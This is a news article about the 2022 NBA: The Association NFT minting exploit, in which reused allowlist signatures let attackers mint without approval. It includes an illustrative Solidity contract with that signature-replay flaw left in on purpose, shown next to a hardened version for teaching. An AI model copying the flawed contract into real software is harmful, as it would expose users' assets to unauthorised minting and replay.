There were a number of problems with the release of NBA: The Association NFT. Web3 and Ethereum specialists were able to discover the hex code that allowed you to create these free NFTs without being on the allowlist for early releases.
To put it simply, users could “loop”, or run software that would produce one NFT for each wallet they created. It gets worse: even though the contract was paused multiple times, these exploiters were able to submit new transactions that minted 100 NFTs each, sending gas prices soaring and quickly selling the project out.
How did they exploit NBA: The Association NFT collection?
According to the smart contract auditor firm BlockSec, the Association NFT has a hole that allows a non-approved user to mint the digital collectible by mimicking the investors’ signatures given early access to the assets.
The #AssociationNFT contract has a vulnerability. The verify function does not
1) have a nonce so that it can be used only once
2) bind the msg sender with the signer@NBAxNFT
@defiprime pic.twitter.com/NsCsBFo2Yo
— BlockSec (@BlockSecTeam) April 21, 2022
The attackers abused this loophole: by sending 0 ETH to the contract address below with the hex calldata shown, they were able to mint as many as they wanted (though this currently doesn’t work).
Contract address: 0xdd5a649fc076886dfd4b9ad6acfc9b5eb882e83c
Hex: [calldata removed]
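To make BlockSec’s two findings concrete, here is an added illustration (not the Association NFT contract, whose source is not reproduced on this page): a hypothetical signature-gated allowlist mint with exactly those two gaps, followed by a hardened version. The contract names, the (recipient, quantity) payload layout and the MAX_PER_WALLET cap are assumptions made for the example; the signature-prefix and ecrecover usage are the standard Ethereum personal-sign pattern.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical allowlist mint (example code, not the NBA project's) whose
// verify step has the two defects BlockSec describes in the tweet above.
contract WeakAllowlistMint {
    address public immutable signer;            // key that issues allowlist approvals
    mapping(address => uint256) public minted;

    constructor(address _signer) { signer = _signer; }

    // The off-chain signer attests (recipient, quantity).
    // Defect 1: the contract never checks recipient == msg.sender, so a
    //           signature observed in any wallet's calldata works for any caller.
    // Defect 2: nothing records that a signature has been consumed, so the
    //           same one can be replayed in as many transactions as desired.
    function mint(address recipient, uint256 quantity,
                  uint8 v, bytes32 r, bytes32 s) external {
        bytes32 digest = keccak256(abi.encodePacked(
            "\x19Ethereum Signed Message:\n32",
            keccak256(abi.encodePacked(recipient, quantity))));
        require(ecrecover(digest, v, r, s) == signer, "bad signature");
        minted[msg.sender] += quantity;
    }
}

// Hardened form: the signed payload names the caller, this contract and the
// chain, plus a per-wallet nonce; the digest is marked used before minting,
// and a per-wallet cap bounds how much any one approval can yield.
contract HardenedAllowlistMint {
    uint256 public constant MAX_PER_WALLET = 1;     // assumed cap for the example

    address public immutable signer;
    mapping(address => uint256) public nonces;      // next expected nonce per wallet
    mapping(bytes32 => bool) public usedDigests;    // replay protection keyed on digest
    mapping(address => uint256) public minted;

    constructor(address _signer) { signer = _signer; }

    function mint(uint256 quantity, uint256 nonce,
                  uint8 v, bytes32 r, bytes32 s) external {
        require(nonce == nonces[msg.sender], "stale nonce");
        require(minted[msg.sender] + quantity <= MAX_PER_WALLET, "wallet limit");

        // msg.sender is part of the signed message, so the approval is
        // bound to the wallet that presents it; address(this) and chainid
        // keep the signature from being reused on another deployment.
        bytes32 digest = keccak256(abi.encodePacked(
            "\x19Ethereum Signed Message:\n32",
            keccak256(abi.encode(msg.sender, quantity, nonce,
                                 address(this), block.chainid))));
        require(!usedDigests[digest], "signature already used");

        address recovered = ecrecover(digest, v, r, s);
        require(recovered != address(0) && recovered == signer, "bad signature");

        // Effects before the mint so a reentrant call cannot reuse the approval.
        usedDigests[digest] = true;
        nonces[msg.sender] = nonce + 1;
        minted[msg.sender] += quantity;
    }
}
```

Keying the replay set on the digest rather than on the raw signature bytes is deliberate: a malleated (v, r, s′) variant of the same signature recovers to the same digest and is rejected, whereas a set keyed on signature bytes would let it through. The nonce and the used-digest set overlap; either alone closes the replay hole, and keeping both costs one extra storage read.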
Despite the exploits, the project doesn’t seem to be affected. The floor for these free NFTs is currently at about 0.3 ETH. Exploiters are sitting pretty, but does it matter if a contract is inefficient or exploited at launch?
After the collection has been minted, players will be assigned randomly and transparently using Chainlink VRF. Everyone has a fair and equal chance of minting any player from any of the 16 Playoff teams. The Association NFT collection will be distributed as a blind mint: recipients of the 2022 NBA Playoffs NFTs won’t know which player they will receive until April 22nd. We recently covered another crypto blunder with a $182 million heist, and I think these things are getting out of hand.
The Association NFT collection includes dynamic player NFTs
The Association NFT is a dynamic collection of NFTs that change appearance over time based on team and player on-court success. For the 2022 NBA Playoffs, 18,000 NFTs in total (75 per player) will be produced. The Association NFTs are linked to real-time data feeds and computations for each team and player via Chainlink oracles. This allows the appearance of each player’s NFT to change automatically based on pre-set goals entered into the Galaxis smart contract.
The more a player achieves throughout the Playoffs, the more visual modifications their NFT will gain, such as backgrounds, player accessories, and emojis created by a variety of artists. Each player’s NFT may also be upgraded through Traits and Accessories, based on the player’s on-court performance and accomplishments. Progression traits are modified when the statistic is achieved in 1, 2, or 3+ games. By the way, Twitter rolls out special hashflags and events for NBA All-Star Weekend.